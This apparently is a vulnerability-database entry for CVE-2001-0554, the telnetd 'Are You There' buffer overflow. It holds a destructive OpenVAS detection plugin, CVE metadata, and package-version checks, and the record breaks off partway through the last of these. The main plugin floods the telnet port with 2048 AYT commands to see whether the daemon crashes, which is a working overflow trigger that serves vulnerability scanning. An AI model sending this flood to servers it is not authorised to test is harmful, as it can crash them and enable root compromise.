ID OPENVAS:136141256231010709 Type openvas Reporter Copyright (C) 2001 Pavel Kankovsky Modified 2020-03-24T00:00:00
Description
The Telnet server does not return an expected number of replies
when it receives a long sequence of
# OpenVAS Vulnerability Test
# Description: TESO in.telnetd buffer overflow
#
# Authors:
# Pavel Kankovsky, DCIT s.r.o. <kan@dcit.cz>
#
# Copyright:
# Copyright (C) 2001 Pavel Kankovsky
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# The kudos for an idea of counting of AYT replies should go
# to Sebastian <scut@nb.in-berlin.de> and Noam Rathaus
# <noamr@beyondsecurity.com>.
#
# rd: tested against Solaris 2.8, RH Lx 6.2, FreeBSD 4.3 (patched & unpatched)
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.10709");
script_version("2020-03-24T06:41:42+0000");
script_tag(name:"last_modification", value:"2020-03-24 06:41:42 +0000 (Tue, 24 Mar 2020)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_xref(name:"IAVA", value:"2001-t-0008");
script_bugtraq_id(3064);
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2001-0554");
script_name("TESO in.telnetd buffer overflow");
script_category(ACT_DESTRUCTIVE_ATTACK);
script_tag(name:"qod_type", value:"remote_vul");
script_copyright("Copyright (C) 2001 Pavel Kankovsky");
script_family("Gain a shell remotely");
# Must run AFTER ms_telnet_overflow-004.nasl
script_dependencies("telnetserver_detect_type_nd_version.nasl");
script_require_ports("Services/telnet", 23);
script_mandatory_keys("telnet/banner/available");
script_xref(name:"URL", value:"http://www.team-teso.net/advisories/teso-advisory-011.tar.gz");
script_tag(name:"solution", value:"Comment out the 'telnet' line in /etc/inetd.conf.");
script_tag(name:"summary", value:"The Telnet server does not return an expected number of replies
when it receives a long sequence of 'Are You There' commands. This probably means it overflows one
of its internal buffers and crashes.");
script_tag(name:"impact", value:"It is likely an attacker could abuse this bug to gain
control over the remote host's superuser.");
script_tag(name:"solution_type", value:"Mitigation");
exit(0);
}
include("telnet_func.inc");
include("misc_func.inc");
iac_ayt = raw_string(0xff, 0xf6);
iac_ao = raw_string(0xff, 0xf5);
iac_will_naol = raw_string(0xff, 0xfb, 0x08);
iac_will_encr = raw_string(0xff, 0xfb, 0x26);
#
# This helper function counts AYT responses in the input stream.
# The input is read until 1. the expected number of responses is found,
# or 2. EOF or read timeout occurs.
#
# At this moment, any occurrence of "Yes" or "yes" is supposed to be such
# a response. Of course, this is wrong: some FreeBSD was observed to react
# with "load: 0.12 cmd: .log 20264 [running] 0.00u 0.00s 0% 620k"
# when the telnet negotiation have been completed. Unfortunately, adding
# another pattern to this code would be too painful (hence the negotiation
# tricks in attack()).
#
# In order to avoid an infinite loop (when testing a host that generates
# lots of junk, intentionally or unintentionally), I stop when I have read
# more than 100 * max bytes.
#
# Please note builtin functions like ereg() or egrep() cannot be used
# here (easily) because they choke on '\0' and many telnet servers send
# this character
#
# Local variables: num, state, bytes, a, i, newstate
#
function count_ayt(sock, max) {
num = 0; state = 0;
bytes = 100 * max;
while (bytes >= 0) {
a = recv(socket:sock, length:1024);
if (!a) return (num);
bytes = bytes - strlen(a);
for (i = 0; i < strlen(a); i = i + 1) {
newstate = 0;
if ((state == 0) && ((a[i] == "y") || (a[i] == "Y")))
newstate = 1;
if ((state == 1) && (a[i] == "e"))
newstate = 2;
if ((state == 2) && (a[i] == "s")) {
# DEBUG display("hit ", a[i-2], a[i-1], a[i], "\n");
num = num + 1;
if (num >= max) return (num);
newstate = 0;
}
state = newstate;
}
}
# inconclusive result
return (-1);
}
#
# This functions tests the vulnerability. "negotiate" indicates whether
# full telnet negotiation should be performed using telnet_init().
# Some targets might need it while others, like FreeBSD, fail to respond
# to AYT in an expected way when the negotiation is done (cf. comments
# accompanying count_ayt()).
#
# Local variables: r, total, size, bomb, succ
#
function attack(port, negotiate) {
succ = 0;
soc = open_sock_tcp(port);
if (!soc) return (0);
if (negotiate)
# standard negotiation
r = telnet_negotiate(socket:soc);
else {
# weird BSD magic, is is necessary?
send(socket:soc, data:iac_will_naol);
send(socket:soc, data:iac_will_encr);
r = 1;
}
if (r) {
# test whether the server talks to us at all
# and whether AYT is supported
send(socket:soc, data:iac_ayt);
r = count_ayt(sock:soc, max:1);
# DEBUG display("probe ", r, "\n");
if (r >= 1) {
# test whether too many AYT's make the server die
total = 2048; size = total * strlen(iac_ayt);
bomb = iac_ao + crap(length:size, data:iac_ayt);
send(socket:soc, data:bomb);
r = count_ayt(sock:soc, max:total);
# DEBUG
#display("attack ", r, " expected ", total, "\n");
if ((r >= 0) && (r < total)) succ = 1;
}
}
close(soc);
return (succ);
}
port = telnet_get_port(default:23);
success = attack(port:port, negotiate:0);
if (!success)
success = attack(port:port, negotiate:1);
if (success) {
security_message(port:port);
exit(0);
}
exit(99);
{"id": "OPENVAS:136141256231010709", "type": "openvas", "bulletinFamily": "scanner", "title": "TESO in.telnetd buffer overflow", "description": "The Telnet server does not return an expected number of replies\n when it receives a long sequence of ", "published": "2005-11-03T00:00:00", "modified": "2020-03-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010709", "reporter": "Copyright (C) 2001 Pavel Kankovsky", "references": ["2001-t-0008", "http://www.team-teso.net/advisories/teso-advisory-011.tar.gz"], "cvelist": ["CVE-2001-0554"], "lastseen": "2020-03-24T16:37:05", "viewCount": 53, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2001-0554"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:6843"]}, {"type": "nessus", "idList": ["TESO_TELNET.NASL", "DEBIAN_DSA-070.NASL", "GENTOO_GLSA-200410-03.NASL", "CSCDW19195.NASL", "DEBIAN_DSA-075.NASL", "MANDRAKE_MDKSA-2001-093.NASL", "MANDRAKE_MDKSA-2001-068.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:809", "OSVDB:10531"]}, {"type": "cisco", "idList": ["CISCO-SA-20020129-CATOS-TELRCV", "CISCO-SA-20020903-VPN3K-VULNERABILITY"]}, {"type": "exploitdb", "idList": ["EDB-ID:21018"]}, {"type": "openvas", "idList": ["OPENVAS:54694", "OPENVAS:10709", "OPENVAS:53824", "OPENVAS:53820"]}, {"type": "cert", "idList": ["VU:745371"]}, {"type": "gentoo", "idList": ["GLSA-200410-03"]}], "modified": "2020-03-24T16:37:05", "rev": 2}, "score": {"value": 9.0, "vector": "NONE", "modified": "2020-03-24T16:37:05", "rev": 2}, "vulnersScore": 9.0}, "pluginID": "136141256231010709", "sourceData": "# OpenVAS Vulnerability Test\n# Description: TESO in.telnetd buffer overflow\n#\n# Authors:\n# Pavel Kankovsky, DCIT s.r.o. <kan@dcit.cz>\n#\n# Copyright:\n# Copyright (C) 2001 Pavel Kankovsky\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n# The kudos for an idea of counting of AYT replies should go\n# to Sebastian <scut@nb.in-berlin.de> and Noam Rathaus\n# <noamr@beyondsecurity.com>.\n#\n# rd: tested against Solaris 2.8, RH Lx 6.2, FreeBSD 4.3 (patched & unpatched)\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10709\");\n script_version(\"2020-03-24T06:41:42+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 06:41:42 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"IAVA\", value:\"2001-t-0008\");\n script_bugtraq_id(3064);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2001-0554\");\n script_name(\"TESO in.telnetd buffer overflow\");\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2001 Pavel Kankovsky\");\n script_family(\"Gain a shell remotely\");\n # Must run AFTER ms_telnet_overflow-004.nasl\n script_dependencies(\"telnetserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n script_mandatory_keys(\"telnet/banner/available\");\n\n script_xref(name:\"URL\", value:\"http://www.team-teso.net/advisories/teso-advisory-011.tar.gz\");\n\n script_tag(name:\"solution\", value:\"Comment out the 'telnet' line in /etc/inetd.conf.\");\n\n script_tag(name:\"summary\", value:\"The Telnet server does not return an expected number of replies\n when it receives a long sequence of 'Are You There' commands. This probably means it overflows one\n of its internal buffers and crashes.\");\n\n script_tag(name:\"impact\", value:\"It is likely an attacker could abuse this bug to gain\n control over the remote host's superuser.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n exit(0);\n}\n\ninclude(\"telnet_func.inc\");\ninclude(\"misc_func.inc\");\n\niac_ayt = raw_string(0xff, 0xf6);\niac_ao = raw_string(0xff, 0xf5);\niac_will_naol = raw_string(0xff, 0xfb, 0x08);\niac_will_encr = raw_string(0xff, 0xfb, 0x26);\n\n#\n# This helper function counts AYT responses in the input stream.\n# The input is read until 1. the expected number of responses is found,\n# or 2. EOF or read timeout occurs.\n#\n# At this moment, any occurrence of \"Yes\" or \"yes\" is supposed to be such\n# a response. Of course, this is wrong: some FreeBSD was observed to react\n# with \"load: 0.12 cmd: .log 20264 [running] 0.00u 0.00s 0% 620k\"\n# when the telnet negotiation have been completed. Unfortunately, adding\n# another pattern to this code would be too painful (hence the negotiation\n# tricks in attack()).\n#\n# In order to avoid an infinite loop (when testing a host that generates\n# lots of junk, intentionally or unintentionally), I stop when I have read\n# more than 100 * max bytes.\n#\n# Please note builtin functions like ereg() or egrep() cannot be used\n# here (easily) because they choke on '\\0' and many telnet servers send\n# this character\n#\n# Local variables: num, state, bytes, a, i, newstate\n#\n\nfunction count_ayt(sock, max) {\n num = 0; state = 0;\n bytes = 100 * max;\n while (bytes >= 0) {\n a = recv(socket:sock, length:1024);\n if (!a) return (num);\n bytes = bytes - strlen(a);\n for (i = 0; i < strlen(a); i = i + 1) {\n newstate = 0;\n if ((state == 0) && ((a[i] == \"y\") || (a[i] == \"Y\")))\n newstate = 1;\n if ((state == 1) && (a[i] == \"e\"))\n newstate = 2;\n if ((state == 2) && (a[i] == \"s\")) {\n # DEBUG display(\"hit \", a[i-2], a[i-1], a[i], \"\\n\");\n num = num + 1;\n if (num >= max) return (num);\n newstate = 0;\n }\n state = newstate;\n }\n }\n # inconclusive result\n return (-1);\n}\n\n#\n# This functions tests the vulnerability. \"negotiate\" indicates whether\n# full telnet negotiation should be performed using telnet_init().\n# Some targets might need it while others, like FreeBSD, fail to respond\n# to AYT in an expected way when the negotiation is done (cf. comments\n# accompanying count_ayt()).\n#\n# Local variables: r, total, size, bomb, succ\n#\n\nfunction attack(port, negotiate) {\n succ = 0;\n soc = open_sock_tcp(port);\n if (!soc) return (0);\n if (negotiate)\n # standard negotiation\n r = telnet_negotiate(socket:soc);\n else {\n # weird BSD magic, is is necessary?\n send(socket:soc, data:iac_will_naol);\n send(socket:soc, data:iac_will_encr);\n r = 1;\n }\n if (r) {\n # test whether the server talks to us at all\n # and whether AYT is supported\n send(socket:soc, data:iac_ayt);\n r = count_ayt(sock:soc, max:1);\n # DEBUG display(\"probe \", r, \"\\n\");\n if (r >= 1) {\n # test whether too many AYT's make the server die\n total = 2048; size = total * strlen(iac_ayt);\n bomb = iac_ao + crap(length:size, data:iac_ayt);\n send(socket:soc, data:bomb);\n r = count_ayt(sock:soc, max:total);\n # DEBUG\n#display(\"attack \", r, \" expected \", total, \"\\n\");\n if ((r >= 0) && (r < total)) succ = 1;\n }\n }\n close(soc);\n return (succ);\n}\n\nport = telnet_get_port(default:23);\nsuccess = attack(port:port, negotiate:0);\nif (!success)\n success = attack(port:port, negotiate:1);\n\nif (success) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Gain a shell remotely"}
{"cve": [{"lastseen": "2020-10-03T11:36:57", "description": "Buffer overflow in BSD-based telnetd telnet daemon on various operating systems allows remote attackers to execute arbitrary commands via a set of options including AYT (Are You There), which is not properly handled by the telrcv function.", "edition": 4, "cvss3": {}, "published": "2001-08-14T04:00:00", "title": "CVE-2001-0554", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-0554"], "modified": "2020-01-21T15:47:00", "cpe": ["cpe:/o:openbsd:openbsd:2.4", "cpe:/o:netbsd:netbsd:1.5.1", "cpe:/o:freebsd:freebsd:4.1.1", "cpe:/o:netbsd:netbsd:1.2", "cpe:/o:sun:sunos:5.8", "cpe:/a:netkit:linux_netkit:0.12", "cpe:/o:sun:sunos:5.0", "cpe:/o:netbsd:netbsd:1.3.2", "cpe:/o:netbsd:netbsd:1.5", "cpe:/a:netkit:linux_netkit:0.10", "cpe:/o:openbsd:openbsd:2.6", "cpe:/o:openbsd:openbsd:2.2", "cpe:/o:ibm:aix:5.1", "cpe:/o:sun:solaris:2.6", "cpe:/o:openbsd:openbsd:2.8", "cpe:/a:mit:kerberos_5:1.2.2", "cpe:/o:freebsd:freebsd:4.3", "cpe:/o:netbsd:netbsd:1.4.1", "cpe:/o:freebsd:freebsd:3.5.1", "cpe:/o:netbsd:netbsd:1.3", "cpe:/o:ibm:aix:4.3.2", "cpe:/o:netbsd:netbsd:1.2.1", "cpe:/o:ibm:aix:4.3.1", "cpe:/o:netbsd:netbsd:1.3.1", "cpe:/o:openbsd:openbsd:2.1", "cpe:/a:mit:kerberos_5:1.1", "cpe:/o:ibm:aix:4.3", "cpe:/o:sun:sunos:5.5.1", "cpe:/o:sun:sunos:5.2", "cpe:/o:sun:sunos:5.7", "cpe:/o:netbsd:netbsd:1.4.2", "cpe:/o:netbsd:netbsd:1.1", "cpe:/o:netbsd:netbsd:1.3.3", "cpe:/o:openbsd:openbsd:2.0", "cpe:/a:netkit:linux_netkit:0.11", "cpe:/a:mit:kerberos_5:1.2.1", "cpe:/o:netbsd:netbsd:1.0", "cpe:/o:sun:sunos:5.4", "cpe:/o:sun:sunos:5.5", "cpe:/o:openbsd:openbsd:2.3", "cpe:/a:mit:kerberos_5:1.1.1", "cpe:/o:sgi:irix:6.5", "cpe:/o:openbsd:openbsd:2.7", "cpe:/a:mit:kerberos_5:1.2", "cpe:/o:ibm:aix:4.3.3", "cpe:/o:openbsd:openbsd:2.5", "cpe:/o:sun:sunos:5.1", "cpe:/o:netbsd:netbsd:1.4", "cpe:/o:sun:sunos:5.3", "cpe:/o:freebsd:freebsd:4.2", "cpe:/a:mit:kerberos:1.0", "cpe:/o:netbsd:netbsd:1.4.3"], "id": "CVE-2001-0554", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0554", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:openbsd:openbsd:2.4:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.5:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.5:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:netkit:linux_netkit:0.12:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.8:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:netkit:linux_netkit:0.11:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.3:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.2:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.1:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.7:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.2:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.4:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.8:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.1:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.5:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.3:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.2:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:netkit:linux_netkit:0.10:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:50:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200410-03.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54694", "href": "http://plugins.openvas.org/nasl.php?oid=54694", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200410-03 (netkit-telnetd)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Buffer overflows exist in the telnet client and daemon provided by\nnetkit-telnetd, which could possibly allow a remote attacker to gain root\nprivileges and compromise the system.\";\ntag_solution = \"All NetKit-telnetd users should upgrade to the latest version:\n\n # emerge sync\n\n # emerge -pv '>=net-misc/netkit-telnetd-0.17-r4'\n # emerge '>=net-misc/netkit-telnetd-0.17-r4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200410-03\nhttp://bugs.gentoo.org/show_bug.cgi?id=64632\nhttp://bugs.debian.org/cgi-bin/bugreport.cgi?bug=264846\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200410-03.\";\n\n \n\nif(description)\n{\n script_id(54694);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(3064);\n script_cve_id(\"CVE-2001-0554\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200410-03 (netkit-telnetd)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/netkit-telnetd\", unaffected: make_list(\"ge 0.17-r4\"), vulnerable: make_list(\"le 0.17-r3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "description": "The remote host is missing an update to netkit-telnet-ssl\nannounced via advisory DSA 075-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53824", "href": "http://plugins.openvas.org/nasl.php?oid=53824", "type": "openvas", "title": "Debian Security Advisory DSA 075-1 (netkit-telnet-ssl)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_075_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 075-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The telnet daemon contained in the netkit-telnet-ssl_0.16.3-1 package in\nthe 'stable' (potato) distribution of Debian GNU/Linux is vulnerable to an\nexploitable overflow in its output handling.\nThe original bug was found by <scut@nb.in-berlin.de>, and announced to\nbugtraq on Jul 18 2001. At that time, netkit-telnet versions after 0.14 were\nnot believed to be vulnerable.\nOn Aug 10 2001, zen-parse posted an advisory based on the same problem, for\nall netkit-telnet versions below 0.17.\nMore details can be found on http://www.securityfocus.com/archive/1/203000 .\nAs Debian uses the 'telnetd' user to run in.telnetd, this is not a remote\nroot compromise on Debian systems; the 'telnetd' user can be compromised.\n\nWe strongly advise you update your netkit-telnet-ssl packages to the versions\nlisted below.\";\ntag_summary = \"The remote host is missing an update to netkit-telnet-ssl\nannounced via advisory DSA 075-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20075-1\";\n\nif(description)\n{\n script_id(53824);\n script_cve_id(\"CVE-2001-0554\");\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 14:24:38 +0100 (Thu, 17 Jan 2008)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 075-1 (netkit-telnet-ssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ssltelnet\", ver:\"0.16.3-1.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"telnet-ssl\", ver:\"0.16.3-1.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"telnetd-ssl\", ver:\"0.16.3-1.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "description": "The remote host is missing an update to netkit-telnet\nannounced via advisory DSA 070-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53820", "href": "http://plugins.openvas.org/nasl.php?oid=53820", "type": "openvas", "title": "Debian Security Advisory DSA 070-1 (netkit-telnet)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_070_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 070-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth 